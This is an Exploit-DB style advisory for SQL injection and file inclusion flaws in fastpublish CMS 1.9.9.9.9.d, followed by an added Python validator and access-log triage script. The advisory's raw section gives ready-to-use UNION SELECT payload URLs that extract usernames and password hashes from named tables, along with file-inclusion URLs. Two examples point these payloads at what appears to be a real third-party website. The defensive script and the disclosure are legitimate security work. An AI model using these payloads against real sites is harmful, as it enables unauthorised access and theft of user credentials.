Vendor: fastpublish CMS
By: ~!Dok_tOR!~
CVSS: 8.8 (HIGH)
SQL Injection and File Inclusion
CWE: 89, 22
Product Name: fastpublish CMS
Affected Version From: 1.9.9.9.9.d
Affected Version To: 1.9.9.9.9.d
Patch Exists: YES
Related CWE: N/A
CPE: a:fastpublish:fastpublish_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

fastpublish CMS SQL Injection and File Inclusion Vulnerabilities

fastpublish CMS version 1.9.9.9.9.d is vulnerable to SQL injection and file inclusion. An attacker can exploit these flaws by sending malicious SQL queries and file inclusion requests to the application. The SQL injection is reachable through the 'q' and 'sprache' parameters of the 'index2.php' script. The file inclusion is reachable through the 'artikel' and 'target' parameters of the 'index2.php' and 'index.php' scripts.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
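
The check below is an added example, not part of the advisory or of fastpublish's code: it validates the four parameters named above against an allow-list of value shapes and uses the same rules to triage access-log lines. The value shapes, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed legitimate value shapes for the four parameters the advisory names.
# These are illustrative assumptions, not taken from the fastpublish code.
RULES = {
    "q": re.compile(r"[A-Za-z0-9_]{1,32}"),       # assumed: short token
    "sprache": re.compile(r"[a-z]{2}"),           # assumed: two-letter language code
    "artikel": re.compile(r"[0-9]{1,9}"),         # assumed: numeric article id
    "target": re.compile(r"[A-Za-z0-9_]{1,32}"),  # assumed: bare name, no path
}
SCRIPTS = ("/index.php", "/index2.php")
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def violations(request_target):
    """Return the sorted names of parameters whose value breaks its rule."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(SCRIPTS):
        return []
    # parse_qs percent-decodes and turns '+' into a space before matching.
    params = parse_qs(parts.query, keep_blank_values=True)
    return sorted(
        name for name, rule in RULES.items()
        if any(not rule.fullmatch(v) for v in params.get(name, []))
    )

def triage(log_lines):
    """Return (client, violated_params) for each offending access-log line."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        bad = violations(m.group(2)) if m else []
        if bad:
            hits.append((m.group(1), bad))
    return hits

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2008:10:00:00 +0000] "GET /index2.php?q=dok&sprache=de HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Oct/2008:10:00:05 +0000] "GET /index2.php?q=dok&sprache=-1\'+union+select+1,2 HTTP/1.1" 200 733',
    '198.51.100.7 - - [05/Oct/2008:10:00:09 +0000] "GET /index.php?artikel=2&target=./forgotpassword.php HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for client, bad in triage(SAMPLE_LOG):
        print(client, "invalid:", ", ".join(bad))
```

The same rules can be enforced in the application or at a reverse proxy; tighten them to the values a given installation actually uses.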

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection

SQL Injection

Exploit 1:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*

Exploit 2:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*

Exploit 3:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*

Exploit 4:

http://localhost/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*

Example:

http://www.jeremias-d-meissner.de/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type  ,user_name,user_pw),7,8,9,10+from+fastpublish__for  um_de_userdata/*

File inclusion

http://localhost/index2.php?artikel=3&target=./[file]

http://localhost/index.php?artikel=2&target=./[file]

Example:

http://www.jeremias-d-meissner.de/index2.php?artikel=3&target=./forgotpassword.php

# milw0rm.com [2008-10-05]